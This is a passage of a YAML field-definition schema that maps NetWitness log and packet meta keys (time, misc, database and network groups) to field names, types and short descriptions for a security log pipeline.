be either UInt16 or Float32 based on the configuration
- name: entropy_res
overwrite: true
type: long
description: This key is only used by the Entropy Parser, the Meta Type can
be either UInt16 or Float32 based on the configuration
- name: event_name
overwrite: true
type: keyword
description: Deprecated key defined only in table map.
- name: feed_category
overwrite: true
type: keyword
description: This is used to capture the category of the feed. This key should
never be used to parse Meta data from a session (Logs/Packets) Directly, this
is a Reserved key in NetWitness
- name: forward_ip
overwrite: true
type: ip
description: This key should be used to capture the IPV4 address of a relay
system which forwarded the events from the original system to NetWitness.
- name: forward_ipv6
overwrite: true
type: ip
description: This key is used to capture the IPV6 address of a relay system
which forwarded the events from the original system to NetWitness. This key
should never be used to parse Meta data from a session (Logs/Packets) Directly,
this is a Reserved key in NetWitness
- name: header_id
overwrite: true
type: keyword
description: This is the Header ID value that identifies the exact log parser
header definition that parses a particular log session. This key should never
be used to parse Meta data from a session (Logs/Packets) Directly, this is
a Reserved key in NetWitness
- name: lc_cid
overwrite: true
type: keyword
description: This is a unique Identifier of a Log Collector. This key should
never be used to parse Meta data from a session (Logs/Packets) Directly, this
is a Reserved key in NetWitness
- name: lc_ctime
overwrite: true
type: date
description: This is the time at which a log is collected in a NetWitness Log
Collector. This key should never be used to parse Meta data from a session
(Logs/Packets) Directly, this is a Reserved key in NetWitness
- name: mcb_req
overwrite: true
type: long
description: This key is only used by the Entropy Parser, the most common byte
request is simply which byte for each side (0 thru 255) was seen the most
- name: mcb_res
overwrite: true
type: long
description: This key is only used by the Entropy Parser, the most common byte
response is simply which byte for each side (0 thru 255) was seen the most
- name: mcbc_req
overwrite: true
type: long
description: This key is only used by the Entropy Parser, the most common byte
count is the number of times the most common byte (above) was seen in the
session streams
- name: mcbc_res
overwrite: true
type: long
description: This key is only used by the Entropy Parser, the most common byte
count is the number of times the most common byte (above) was seen in the
session streams
- name: medium
overwrite: true
type: long
description: "This key is used to identify if it\u2019s a log/packet session\
\ or Layer 2 Encapsulation Type. This key should never be used to parse Meta\
\ data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness.\
\ 32 = log, 33 = correlation session, < 32 is packet session"
- name: node_name
overwrite: true
type: keyword
description: Deprecated key defined only in table map.
- name: nwe_callback_id
overwrite: true
type: keyword
description: This key denotes that event is endpoint related
- name: parse_error
overwrite: true
type: keyword
description: This is a special key that stores any Meta key validation error
found while parsing a log session. This key should never be used to parse
Meta data from a session (Logs/Packets) Directly, this is a Reserved key in
NetWitness
- name: payload_req
overwrite: true
type: long
description: This key is only used by the Entropy Parser, the payload size metrics
are the payload sizes of each session side at the time of parsing. However,
in order to keep
- name: payload_res
overwrite: true
type: long
description: This key is only used by the Entropy Parser, the payload size metrics
are the payload sizes of each session side at the time of parsing. However,
in order to keep
- name: process_vid_dst
overwrite: true
type: keyword
description: Endpoint generates and uses a unique virtual ID to identify any
similar group of process. This ID represents the target process.
- name: process_vid_src
overwrite: true
type: keyword
description: Endpoint generates and uses a unique virtual ID to identify any
similar group of process. This ID represents the source process.
- name: rid
overwrite: true
type: long
description: This is a special ID of the Remote Session created by NetWitness
Decoder. This key should never be used to parse Meta data from a session (Logs/Packets)
Directly, this is a Reserved key in NetWitness
- name: session_split
overwrite: true
type: keyword
description: This key should never be used to parse Meta data from a session
(Logs/Packets) Directly, this is a Reserved key in NetWitness
- name: site
overwrite: true
type: keyword
description: Deprecated key defined only in table map.
- name: size
overwrite: true
type: long
description: This is the size of the session as seen by the NetWitness Decoder.
This key should never be used to parse Meta data from a session (Logs/Packets)
Directly, this is a Reserved key in NetWitness
- name: sourcefile
overwrite: true
type: keyword
description: This is the name of the log file or PCAPs that can be imported
into NetWitness. This key should never be used to parse Meta data from a session
(Logs/Packets) Directly, this is a Reserved key in NetWitness
- name: ubc_req
overwrite: true
type: long
description: This key is only used by the Entropy Parser, Unique byte count
is the number of unique bytes seen in each stream. 256 would mean all byte
values of 0 thru 255 were seen at least once
- name: ubc_res
overwrite: true
type: long
description: This key is only used by the Entropy Parser, Unique byte count
is the number of unique bytes seen in each stream. 256 would mean all byte
values of 0 thru 255 were seen at least once
- name: word
overwrite: true
type: keyword
description: This is used by the Word Parsing technology to capture the first
5 character of every word in an unparsed log
- name: time
overwrite: true
type: group
fields:
- name: event_time
overwrite: true
type: date
description: This key is used to capture the time mentioned in a raw session
that represents the actual time an event occured in a standard normalized
form
- name: duration_time
overwrite: true
type: double
description: This key is used to capture the normalized duration/lifetime in
seconds.
- name: event_time_str
overwrite: true
type: keyword
description: This key is used to capture the incomplete time mentioned in a
session as a string
- name: starttime
overwrite: true
type: date
description: This key is used to capture the Start time mentioned in a session
in a standard form
- name: month
overwrite: true
type: keyword
- name: day
overwrite: true
type: keyword
- name: endtime
overwrite: true
type: date
description: This key is used to capture the End time mentioned in a session
in a standard form
- name: timezone
overwrite: true
type: keyword
description: This key is used to capture the timezone of the Event Time
- name: duration_str
overwrite: true
type: keyword
description: A text string version of the duration
- name: date
overwrite: true
type: keyword
- name: year
overwrite: true
type: keyword
- name: recorded_time
overwrite: true
type: date
description: The event time as recorded by the system the event is collected
from. The usage scenario is a multi-tier application where the management
layer of the system records it's own timestamp at the time of collection from
its child nodes. Must be in timestamp format.
- name: datetime
overwrite: true
type: keyword
- name: effective_time
overwrite: true
type: date
description: This key is the effective time referenced by an individual event
in a Standard Timestamp format
- name: expire_time
overwrite: true
type: date
description: This key is the timestamp that explicitly refers to an expiration.
- name: process_time
overwrite: true
type: keyword
description: Deprecated, use duration.time
- name: hour
overwrite: true
type: keyword
- name: min
overwrite: true
type: keyword
- name: timestamp
overwrite: true
type: keyword
- name: event_queue_time
overwrite: true
type: date
description: This key is the Time that the event was queued.
- name: p_time1
overwrite: true
type: keyword
- name: tzone
overwrite: true
type: keyword
- name: eventtime
overwrite: true
type: keyword
- name: gmtdate
overwrite: true
type: keyword
- name: gmttime
overwrite: true
type: keyword
- name: p_date
overwrite: true
type: keyword
- name: p_month
overwrite: true
type: keyword
- name: p_time
overwrite: true
type: keyword
- name: p_time2
overwrite: true
type: keyword
- name: p_year
overwrite: true
type: keyword
- name: expire_time_str
overwrite: true
type: keyword
description: This key is used to capture incomplete timestamp that explicitly
refers to an expiration.
- name: stamp
overwrite: true
type: date
description: Deprecated key defined only in table map.
- name: misc
overwrite: true
type: group
fields:
- name: action
overwrite: true
type: keyword
- name: result
overwrite: true
type: keyword
description: This key is used to capture the outcome/result string value of
an action in a session.
- name: severity
overwrite: true
type: keyword
description: This key is used to capture the severity given the session
- name: event_type
overwrite: true
type: keyword
description: This key captures the event category type as specified by the event
source.
- name: reference_id
overwrite: true
type: keyword
description: This key is used to capture an event id from the session directly
- name: version
overwrite: true
type: keyword
description: This key captures Version of the application or OS which is generating
the event.
- name: disposition
overwrite: true
type: keyword
description: This key captures the The end state of an action.
- name: result_code
overwrite: true
type: keyword
description: This key is used to capture the outcome/result numeric value of
an action in a session
- name: category
overwrite: true
type: keyword
description: This key is used to capture the category of an event given by the
vendor in the session
- name: obj_name
overwrite: true
type: keyword
description: This is used to capture name of object
- name: obj_type
overwrite: true
type: keyword
description: This is used to capture type of object
- name: event_source
overwrite: true
type: keyword
description: "This key captures Source of the event that\u2019s not a hostname"
- name: log_session_id
overwrite: true
type: keyword
description: This key is used to capture a sessionid from the session directly
- name: group
overwrite: true
type: keyword
description: This key captures the Group Name value
- name: policy_name
overwrite: true
type: keyword
description: This key is used to capture the Policy Name only.
- name: rule_name
overwrite: true
type: keyword
description: This key captures the Rule Name
- name: context
overwrite: true
type: keyword
description: This key captures Information which adds additional context to
the event.
- name: change_new
overwrite: true
type: keyword
description: "This key is used to capture the new values of the attribute that\u2019\
s changing in a session"
- name: space
overwrite: true
type: keyword
- name: client
overwrite: true
type: keyword
description: This key is used to capture only the name of the client application
requesting resources of the server. See the user.agent meta key for capture
of the specific user agent identifier or browser identification string.
- name: msgIdPart1
overwrite: true
type: keyword
- name: msgIdPart2
overwrite: true
type: keyword
- name: change_old
overwrite: true
type: keyword
description: "This key is used to capture the old value of the attribute that\u2019\
s changing in a session"
- name: operation_id
overwrite: true
type: keyword
description: An alert number or operation number. The values should be unique
and non-repeating.
- name: event_state
overwrite: true
type: keyword
description: This key captures the current state of the object/item referenced
within the event. Describing an on-going event.
- name: group_object
overwrite: true
type: keyword
description: This key captures a collection/grouping of entities. Specific usage
- name: node
overwrite: true
type: keyword
description: Common use case is the node name within a cluster. The cluster
name is reflected by the host name.
- name: rule
overwrite: true
type: keyword
description: This key captures the Rule number
- name: device_name
overwrite: true
type: keyword
description: 'This is used to capture name of the Device associated with the
node Like: a physical disk, printer, etc'
- name: param
overwrite: true
type: keyword
description: This key is the parameters passed as part of a command or application,
etc.
- name: change_attrib
overwrite: true
type: keyword
description: "This key is used to capture the name of the attribute that\u2019\
s changing in a session"
- name: event_computer
overwrite: true
type: keyword
description: This key is a windows only concept, where this key is used to capture
fully qualified domain name in a windows log.
- name: reference_id1
overwrite: true
type: keyword
description: This key is for Linked ID to be used as an addition to "reference.id"
- name: event_log
overwrite: true
type: keyword
description: This key captures the Name of the event log
- name: OS
overwrite: true
type: keyword
description: This key captures the Name of the Operating System
- name: terminal
overwrite: true
type: keyword
description: This key captures the Terminal Names only
- name: msgIdPart3
overwrite: true
type: keyword
- name: filter
overwrite: true
type: keyword
description: This key captures Filter used to reduce result set
- name: serial_number
overwrite: true
type: keyword
description: This key is the Serial number associated with a physical asset.
- name: checksum
overwrite: true
type: keyword
description: This key is used to capture the checksum or hash of the entity
such as a file or process. Checksum should be used over checksum.src or checksum.dst
when it is unclear whether the entity is a source or target of an action.
- name: event_user
overwrite: true
type: keyword
description: This key is a Windows-only concept, used to capture the combination of domain name and username in a Windows log.
- name: virusname
overwrite: true
type: keyword
description: This key captures the name of the virus
- name: content_type
overwrite: true
type: keyword
description: This key is used to capture Content Type only.
- name: group_id
overwrite: true
type: keyword
description: This key captures Group ID Number (related to the group name)
- name: policy_id
overwrite: true
type: keyword
description: This key is used to capture the Policy ID only; this should be a numeric value. Use policy.name otherwise.
- name: vsys
overwrite: true
type: keyword
description: This key captures Virtual System Name
- name: connection_id
overwrite: true
type: keyword
description: This key captures the Connection ID
- name: reference_id2
overwrite: true
type: keyword
description: This key is for the 2nd Linked ID. Can be either linked to "reference.id"
or "reference.id1" value but should not be used unless the other two variables
are in play.
- name: sensor
overwrite: true
type: keyword
description: This key captures Name of the sensor. Typically used in IDS/IPS
based devices
- name: sig_id
overwrite: true
type: long
description: This key captures IDS/IPS Int Signature ID
- name: port_name
overwrite: true
type: keyword
description: 'This key is used for Physical or logical port connection but does
NOT include a network port. (Example: Printer port name).'
- name: rule_group
overwrite: true
type: keyword
description: This key captures the Rule group name
- name: risk_num
overwrite: true
type: double
description: This key captures a Numeric Risk value
- name: trigger_val
overwrite: true
type: keyword
description: This key captures the Value of the trigger or threshold condition.
- name: log_session_id1
overwrite: true
type: keyword
description: This key is used to capture a Linked (Related) Session ID from
the session directly
- name: comp_version
overwrite: true
type: keyword
description: This key captures the Version level of a sub-component of a product.
- name: content_version
overwrite: true
type: keyword
description: This key captures Version level of a signature or database content.
- name: hardware_id
overwrite: true
type: keyword
description: This key is used to capture a unique identifier for a device or system (NOT a MAC address)
- name: risk
overwrite: true
type: keyword
description: This key captures the non-numeric risk value
- name: event_id
overwrite: true
type: keyword
- name: reason
overwrite: true
type: keyword
- name: status
overwrite: true
type: keyword
- name: mail_id
overwrite: true
type: keyword
description: This key is used to capture the mailbox id/name
- name: rule_uid
overwrite: true
type: keyword
description: This key is the Unique Identifier for a rule.
- name: trigger_desc
overwrite: true
type: keyword
description: This key captures the Description of the trigger or threshold condition.
- name: inout
overwrite: true
type: keyword
- name: p_msgid
overwrite: true
type: keyword
- name: data_type
overwrite: true
type: keyword
- name: msgIdPart4
overwrite: true
type: keyword
- name: error
overwrite: true
type: keyword
description: This key captures all non-successful error codes or responses
- name: index
overwrite: true
type: keyword
- name: listnum
overwrite: true
type: keyword
description: This key is used to capture a list name or list number, primarily for collecting access-lists
- name: ntype
overwrite: true
type: keyword
- name: observed_val
overwrite: true
type: keyword
description: This key captures the Value observed (from the perspective of the
device generating the log).
- name: policy_value
overwrite: true
type: keyword
description: This key captures the contents of the policy. This contains details
about the policy
- name: pool_name
overwrite: true
type: keyword
description: This key captures the name of a resource pool
- name: rule_template
overwrite: true
type: keyword
description: A default set of parameters which are overlaid onto a rule (or rulename), which effectively constitutes a template
- name: count
overwrite: true
type: keyword
- name: number
overwrite: true
type: keyword
- name: sigcat
overwrite: true
type: keyword
- name: type
overwrite: true
type: keyword
- name: comments
overwrite: true
type: keyword
description: Comment information provided in the log message
- name: doc_number
overwrite: true
type: long
description: This key captures File Identification number
- name: expected_val
overwrite: true
type: keyword
description: This key captures the Value expected (from the perspective of the
device generating the log).
- name: job_num
overwrite: true
type: keyword
description: This key captures the Job Number
- name: spi_dst
overwrite: true
type: keyword
description: Destination SPI Index
- name: spi_src
overwrite: true
type: keyword
description: Source SPI Index
- name: code
overwrite: true
type: keyword
- name: agent_id
overwrite: true
type: keyword
description: This key is used to capture agent id
- name: message_body
overwrite: true
type: keyword
description: This key captures the contents of the message body.
- name: phone
overwrite: true
type: keyword
- name: sig_id_str
overwrite: true
type: keyword
description: This key captures a string object of the sigid variable.
- name: cmd
overwrite: true
type: keyword
- name: misc
overwrite: true
type: keyword
- name: name
overwrite: true
type: keyword
- name: cpu
overwrite: true
type: long
description: This key is the CPU time used in the execution of the event being
recorded.
- name: event_desc
overwrite: true
type: keyword
description: This key is used to capture a description of an event available
directly or inferred
- name: sig_id1
overwrite: true
type: long
description: This key captures IDS/IPS Int Signature ID. This must be linked
to the sig.id
- name: im_buddyid
overwrite: true
type: keyword
- name: im_client
overwrite: true
type: keyword
- name: im_userid
overwrite: true
type: keyword
- name: pid
overwrite: true
type: keyword
- name: priority
overwrite: true
type: keyword
- name: context_subject
overwrite: true
type: keyword
description: This key is to be used in an audit context where the subject is
the object being identified
- name: context_target
overwrite: true
type: keyword
- name: cve
overwrite: true
type: keyword
description: This key captures CVE (Common Vulnerabilities and Exposures) -
an identifier for known information security vulnerabilities.
- name: fcatnum
overwrite: true
type: keyword
description: This key captures Filter Category Number. Legacy Usage
- name: library
overwrite: true
type: keyword
description: This key is used to capture library information in mainframe devices
- name: parent_node
overwrite: true
type: keyword
description: This key captures the Parent Node Name. Must be related to node
variable.
- name: risk_info
overwrite: true
type: keyword
description: Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*)
- name: tcp_flags
overwrite: true
type: long
description: This key captures the TCP flags set in any packet of the session
- name: tos
overwrite: true
type: long
description: This key describes the type of service
- name: vm_target
overwrite: true
type: keyword
description: VMWare Target. **VMWARE** only variable.
- name: workspace
overwrite: true
type: keyword
description: This key captures Workspace Description
- name: command
overwrite: true
type: keyword
- name: event_category
overwrite: true
type: keyword
- name: facilityname
overwrite: true
type: keyword
- name: forensic_info
overwrite: true
type: keyword
- name: jobname
overwrite: true
type: keyword
- name: mode
overwrite: true
type: keyword
- name: policy
overwrite: true
type: keyword
- name: policy_waiver
overwrite: true
type: keyword
- name: second
overwrite: true
type: keyword
- name: space1
overwrite: true
type: keyword
- name: subcategory
overwrite: true
type: keyword
- name: tbdstr2
overwrite: true
type: keyword
- name: alert_id
overwrite: true
type: keyword
description: Deprecated, New Hunting Model (inv.*, ioc, boc, eoc, analysis.*)
- name: checksum_dst
overwrite: true
type: keyword
description: This key is used to capture the checksum or hash of the target entity such as a process or file.
- name: checksum_src
overwrite: true
type: keyword
description: This key is used to capture the checksum or hash of the source
entity such as a file or process.
- name: fresult
overwrite: true
type: long
description: This key captures the Filter Result
- name: payload_dst
overwrite: true
type: keyword
description: This key is used to capture destination payload
- name: payload_src
overwrite: true
type: keyword
description: This key is used to capture source payload
- name: pool_id
overwrite: true
type: keyword
description: This key captures the identifier (typically numeric field) of a
resource pool
- name: process_id_val
overwrite: true
type: keyword
description: This key is a failure key for Process ID when it is not an integer
value
- name: risk_num_comm
overwrite: true
type: double
description: This key captures Risk Number Community
- name: risk_num_next
overwrite: true
type: double
description: This key captures Risk Number NextGen
- name: risk_num_sand
overwrite: true
type: double
description: This key captures Risk Number SandBox
- name: risk_num_static
overwrite: true
type: double
description: This key captures Risk Number Static
- name: risk_suspicious
overwrite: true
type: keyword
description: Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*)
- name: risk_warning
overwrite: true
type: keyword
description: Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*)
- name: snmp_oid
overwrite: true
type: keyword
description: SNMP Object Identifier
- name: sql
overwrite: true
type: keyword
description: This key captures the SQL query
- name: vuln_ref
overwrite: true
type: keyword
description: This key captures the Vulnerability Reference details
- name: acl_id
overwrite: true
type: keyword
- name: acl_op
overwrite: true
type: keyword
- name: acl_pos
overwrite: true
type: keyword
- name: acl_table
overwrite: true
type: keyword
- name: admin
overwrite: true
type: keyword
- name: alarm_id
overwrite: true
type: keyword
- name: alarmname
overwrite: true
type: keyword
- name: app_id
overwrite: true
type: keyword
- name: audit
overwrite: true
type: keyword
- name: audit_object
overwrite: true
type: keyword
- name: auditdata
overwrite: true
type: keyword
- name: benchmark
overwrite: true
type: keyword
- name: bypass
overwrite: true
type: keyword
- name: cache
overwrite: true
type: keyword
- name: cache_hit
overwrite: true
type: keyword
- name: cefversion
overwrite: true
type: keyword
- name: cfg_attr
overwrite: true
type: keyword
- name: cfg_obj
overwrite: true
type: keyword
- name: cfg_path
overwrite: true
type: keyword
- name: changes
overwrite: true
type: keyword
- name: client_ip
overwrite: true
type: keyword
- name: clustermembers
overwrite: true
type: keyword
- name: cn_acttimeout
overwrite: true
type: keyword
- name: cn_asn_src
overwrite: true
type: keyword
- name: cn_bgpv4nxthop
overwrite: true
type: keyword
- name: cn_ctr_dst_code
overwrite: true
type: keyword
- name: cn_dst_tos
overwrite: true
type: keyword
- name: cn_dst_vlan
overwrite: true
type: keyword
- name: cn_engine_id
overwrite: true
type: keyword
- name: cn_engine_type
overwrite: true
type: keyword
- name: cn_f_switch
overwrite: true
type: keyword
- name: cn_flowsampid
overwrite: true
type: keyword
- name: cn_flowsampintv
overwrite: true
type: keyword
- name: cn_flowsampmode
overwrite: true
type: keyword
- name: cn_inacttimeout
overwrite: true
type: keyword
- name: cn_inpermbyts
overwrite: true
type: keyword
- name: cn_inpermpckts
overwrite: true
type: keyword
- name: cn_invalid
overwrite: true
type: keyword
- name: cn_ip_proto_ver
overwrite: true
type: keyword
- name: cn_ipv4_ident
overwrite: true
type: keyword
- name: cn_l_switch
overwrite: true
type: keyword
- name: cn_log_did
overwrite: true
type: keyword
- name: cn_log_rid
overwrite: true
type: keyword
- name: cn_max_ttl
overwrite: true
type: keyword
- name: cn_maxpcktlen
overwrite: true
type: keyword
- name: cn_min_ttl
overwrite: true
type: keyword
- name: cn_minpcktlen
overwrite: true
type: keyword
- name: cn_mpls_lbl_1
overwrite: true
type: keyword
- name: cn_mpls_lbl_10
overwrite: true
type: keyword
- name: cn_mpls_lbl_2
overwrite: true
type: keyword
- name: cn_mpls_lbl_3
overwrite: true
type: keyword
- name: cn_mpls_lbl_4
overwrite: true
type: keyword
- name: cn_mpls_lbl_5
overwrite: true
type: keyword
- name: cn_mpls_lbl_6
overwrite: true
type: keyword
- name: cn_mpls_lbl_7
overwrite: true
type: keyword
- name: cn_mpls_lbl_8
overwrite: true
type: keyword
- name: cn_mpls_lbl_9
overwrite: true
type: keyword
- name: cn_mplstoplabel
overwrite: true
type: keyword
- name: cn_mplstoplabip
overwrite: true
type: keyword
- name: cn_mul_dst_byt
overwrite: true
type: keyword
- name: cn_mul_dst_pks
overwrite: true
type: keyword
- name: cn_muligmptype
overwrite: true
type: keyword
- name: cn_sampalgo
overwrite: true
type: keyword
- name: cn_sampint
overwrite: true
type: keyword
- name: cn_seqctr
overwrite: true
type: keyword
- name: cn_spackets
overwrite: true
type: keyword
- name: cn_src_tos
overwrite: true
type: keyword
- name: cn_src_vlan
overwrite: true
type: keyword
- name: cn_sysuptime
overwrite: true
type: keyword
- name: cn_template_id
overwrite: true
type: keyword
- name: cn_totbytsexp
overwrite: true
type: keyword
- name: cn_totflowexp
overwrite: true
type: keyword
- name: cn_totpcktsexp
overwrite: true
type: keyword
- name: cn_unixnanosecs
overwrite: true
type: keyword
- name: cn_v6flowlabel
overwrite: true
type: keyword
- name: cn_v6optheaders
overwrite: true
type: keyword
- name: comp_class
overwrite: true
type: keyword
- name: comp_name
overwrite: true
type: keyword
- name: comp_rbytes
overwrite: true
type: keyword
- name: comp_sbytes
overwrite: true
type: keyword
- name: cpu_data
overwrite: true
type: keyword
- name: criticality
overwrite: true
type: keyword
- name: cs_agency_dst
overwrite: true
type: keyword
- name: cs_analyzedby
overwrite: true
type: keyword
- name: cs_av_other
overwrite: true
type: keyword
- name: cs_av_primary
overwrite: true
type: keyword
- name: cs_av_secondary
overwrite: true
type: keyword
- name: cs_bgpv6nxthop
overwrite: true
type: keyword
- name: cs_bit9status
overwrite: true
type: keyword
- name: cs_context
overwrite: true
type: keyword
- name: cs_control
overwrite: true
type: keyword
- name: cs_data
overwrite: true
type: keyword
- name: cs_datecret
overwrite: true
type: keyword
- name: cs_dst_tld
overwrite: true
type: keyword
- name: cs_eth_dst_ven
overwrite: true
type: keyword
- name: cs_eth_src_ven
overwrite: true
type: keyword
- name: cs_event_uuid
overwrite: true
type: keyword
- name: cs_filetype
overwrite: true
type: keyword
- name: cs_fld
overwrite: true
type: keyword
- name: cs_if_desc
overwrite: true
type: keyword
- name: cs_if_name
overwrite: true
type: keyword
- name: cs_ip_next_hop
overwrite: true
type: keyword
- name: cs_ipv4dstpre
overwrite: true
type: keyword
- name: cs_ipv4srcpre
overwrite: true
type: keyword
- name: cs_lifetime
overwrite: true
type: keyword
- name: cs_log_medium
overwrite: true
type: keyword
- name: cs_loginname
overwrite: true
type: keyword
- name: cs_modulescore
overwrite: true
type: keyword
- name: cs_modulesign
overwrite: true
type: keyword
- name: cs_opswatresult
overwrite: true
type: keyword
- name: cs_payload
overwrite: true
type: keyword
- name: cs_registrant
overwrite: true
type: keyword
- name: cs_registrar
overwrite: true
type: keyword
- name: cs_represult
overwrite: true
type: keyword
- name: cs_rpayload
overwrite: true
type: keyword
- name: cs_sampler_name
overwrite: true
type: keyword
- name: cs_sourcemodule
overwrite: true
type: keyword
- name: cs_streams
overwrite: true
type: keyword
- name: cs_targetmodule
overwrite: true
type: keyword
- name: cs_v6nxthop
overwrite: true
type: keyword
- name: cs_whois_server
overwrite: true
type: keyword
- name: cs_yararesult
overwrite: true
type: keyword
- name: description
overwrite: true
type: keyword
- name: devvendor
overwrite: true
type: keyword
- name: distance
overwrite: true
type: keyword
- name: dstburb
overwrite: true
type: keyword
- name: edomain
overwrite: true
type: keyword
- name: edomaub
overwrite: true
type: keyword
- name: euid
overwrite: true
type: keyword
- name: facility
overwrite: true
type: keyword
- name: finterface
overwrite: true
type: keyword
- name: flags
overwrite: true
type: keyword
- name: gaddr
overwrite: true
type: keyword
- name: id3
overwrite: true
type: keyword
- name: im_buddyname
overwrite: true
type: keyword
- name: im_croomid
overwrite: true
type: keyword
- name: im_croomtype
overwrite: true
type: keyword
- name: im_members
overwrite: true
type: keyword
- name: im_username
overwrite: true
type: keyword
- name: ipkt
overwrite: true
type: keyword
- name: ipscat
overwrite: true
type: keyword
- name: ipspri
overwrite: true
type: keyword
- name: latitude
overwrite: true
type: keyword
- name: linenum
overwrite: true
type: keyword
- name: list_name
overwrite: true
type: keyword
- name: load_data
overwrite: true
type: keyword
- name: location_floor
overwrite: true
type: keyword
- name: location_mark
overwrite: true
type: keyword
- name: log_id
overwrite: true
type: keyword
- name: log_type
overwrite: true
type: keyword
- name: logid
overwrite: true
type: keyword
- name: logip
overwrite: true
type: keyword
- name: logname
overwrite: true
type: keyword
- name: longitude
overwrite: true
type: keyword
- name: lport
overwrite: true
type: keyword
- name: mbug_data
overwrite: true
type: keyword
- name: misc_name
overwrite: true
type: keyword
- name: msg_type
overwrite: true
type: keyword
- name: msgid
overwrite: true
type: keyword
- name: netsessid
overwrite: true
type: keyword
- name: num
overwrite: true
type: keyword
- name: number1
overwrite: true
type: keyword
- name: number2
overwrite: true
type: keyword
- name: nwwn
overwrite: true
type: keyword
- name: object
overwrite: true
type: keyword
- name: operation
overwrite: true
type: keyword
- name: opkt
overwrite: true
type: keyword
- name: orig_from
overwrite: true
type: keyword
- name: owner_id
overwrite: true
type: keyword
- name: p_action
overwrite: true
type: keyword
- name: p_filter
overwrite: true
type: keyword
- name: p_group_object
overwrite: true
type: keyword
- name: p_id
overwrite: true
type: keyword
- name: p_msgid1
overwrite: true
type: keyword
- name: p_msgid2
overwrite: true
type: keyword
- name: p_result1
overwrite: true
type: keyword
- name: password_chg
overwrite: true
type: keyword
- name: password_expire
overwrite: true
type: keyword
- name: permgranted
overwrite: true
type: keyword
- name: permwanted
overwrite: true
type: keyword
- name: pgid
overwrite: true
type: keyword
- name: policyUUID
overwrite: true
type: keyword
- name: prog_asp_num
overwrite: true
type: keyword
- name: program
overwrite: true
type: keyword
- name: real_data
overwrite: true
type: keyword
- name: rec_asp_device
overwrite: true
type: keyword
- name: rec_asp_num
overwrite: true
type: keyword
- name: rec_library
overwrite: true
type: keyword
- name: recordnum
overwrite: true
type: keyword
- name: ruid
overwrite: true
type: keyword
- name: sburb
overwrite: true
type: keyword
- name: sdomain_fld
overwrite: true
type: keyword
- name: sec
overwrite: true
type: keyword
- name: sensorname
overwrite: true
type: keyword
- name: seqnum
overwrite: true
type: keyword
- name: session
overwrite: true
type: keyword
- name: sessiontype
overwrite: true
type: keyword
- name: sigUUID
overwrite: true
type: keyword
- name: spi
overwrite: true
type: keyword
- name: srcburb
overwrite: true
type: keyword
- name: srcdom
overwrite: true
type: keyword
- name: srcservice
overwrite: true
type: keyword
- name: state
overwrite: true
type: keyword
- name: status1
overwrite: true
type: keyword
- name: svcno
overwrite: true
type: keyword
- name: system
overwrite: true
type: keyword
- name: tbdstr1
overwrite: true
type: keyword
- name: tgtdom
overwrite: true
type: keyword
- name: tgtdomain
overwrite: true
type: keyword
- name: threshold
overwrite: true
type: keyword
- name: type1
overwrite: true
type: keyword
- name: udb_class
overwrite: true
type: keyword
- name: url_fld
overwrite: true
type: keyword
- name: user_div
overwrite: true
type: keyword
- name: userid
overwrite: true
type: keyword
- name: username_fld
overwrite: true
type: keyword
- name: utcstamp
overwrite: true
type: keyword
- name: v_instafname
overwrite: true
type: keyword
- name: virt_data
overwrite: true
type: keyword
- name: vpnid
overwrite: true
type: keyword
- name: autorun_type
overwrite: true
type: keyword
description: This is used to capture Auto Run type
- name: cc_number
overwrite: true
type: long
description: Valid Credit Card Numbers only
- name: content
overwrite: true
type: keyword
description: This key captures the content type from protocol headers
- name: ein_number
overwrite: true
type: long
description: Employee Identification Numbers only
- name: found
overwrite: true
type: keyword
description: This is used to capture the results of regex match
- name: language
overwrite: true
type: keyword
description: This is used to capture the list of languages the client supports and which it prefers
- name: lifetime
overwrite: true
type: long
description: This key is used to capture the session lifetime in seconds.
- name: link
overwrite: true
type: keyword
description: This key is used to link the sessions together. This key should never be used to parse meta data from a session (Logs/Packets) directly; this is a reserved key in NetWitness
- name: match
overwrite: true
type: keyword
description: This key is for regex match name from search.ini
- name: param_dst
overwrite: true
type: keyword
description: This key captures the command line/launch argument of the target
process or file
- name: param_src
overwrite: true
type: keyword
description: This key captures source parameter
- name: search_text
overwrite: true
type: keyword
description: This key captures the Search Text used
- name: sig_name
overwrite: true
type: keyword
description: This key is used to capture the Signature Name only.
- name: snmp_value
overwrite: true
type: keyword
description: SNMP set request value
- name: streams
overwrite: true
type: long
description: This key captures number of streams in session
- name: db
overwrite: true
type: group
fields:
- name: index
overwrite: true
type: keyword
description: This key captures IndexID of the index.
- name: instance
overwrite: true
type: keyword
description: This key is used to capture the database server instance name
- name: database
overwrite: true
type: keyword
description: This key is used to capture the name of a database or an instance
as seen in a session
- name: transact_id
overwrite: true
type: keyword
description: This key captures the SQL transaction ID of the current session
- name: permissions
overwrite: true
type: keyword
description: This key captures permission or privilege level assigned to a resource.
- name: table_name
overwrite: true
type: keyword
description: This key is used to capture the table name
- name: db_id
overwrite: true
type: keyword
description: This key is used to capture the unique identifier for a database
- name: db_pid
overwrite: true
type: long
description: This key captures the process id of a connection with database
server
- name: lread
overwrite: true
type: long
description: This key is used for the number of logical reads
- name: lwrite
overwrite: true
type: long
description: This key is used for the number of logical writes
- name: pread
overwrite: true
type: long
description: This key is used for the number of physical reads
- name: network
overwrite: true
type: group
fields:
- name: alias_host
overwrite: true
type: keyword
description: This key should be used when the source or destination context of a hostname is not clear. Also it captures the Device Hostname. Any Hostname that isn't ad.computer.
- name: domain
overwrite: true
type: keyword
- name: host_dst
overwrite: true
type: keyword
description: "This key should only be used when it\u2019s a Destination Hostname"
- name: network_service
overwrite: true
type: keyword
description: This is used to capture layer 7 protocols/service names
- name: interface
overwrite: true
type: keyword
description: This key should be used when the source or destination context
of an interface is not clear
- name: network_port
overwrite: true
type: long
description: 'Deprecated, use port. NOTE: There is a type discrepancy as currently
used, TM: Int32, INDEX: UInt64 (why neither chose the correct UInt16?!)'
- name: eth_host
overwrite: true
type: keyword
description: Deprecated, use alias.mac
- name: sinterface
overwrite: true
type: keyword
description: "This key should only be used when it\u2019s a Source Interface"
- name: dinterface
overwrite: true
type: keyword
description: "This key should only be used when it\u2019s a Destination Interface"
- name: vlan
overwrite: true
type: long
description: This key should only be used to capture the ID of the Virtual LAN
- name: zone_src
overwrite: true
type: keyword
description: "This key should only be used when it\u2019s a Source Zone."
- name: zone
overwrite: true
type: keyword
description: This key should be used when the source or destination context
of a Zone is not clear
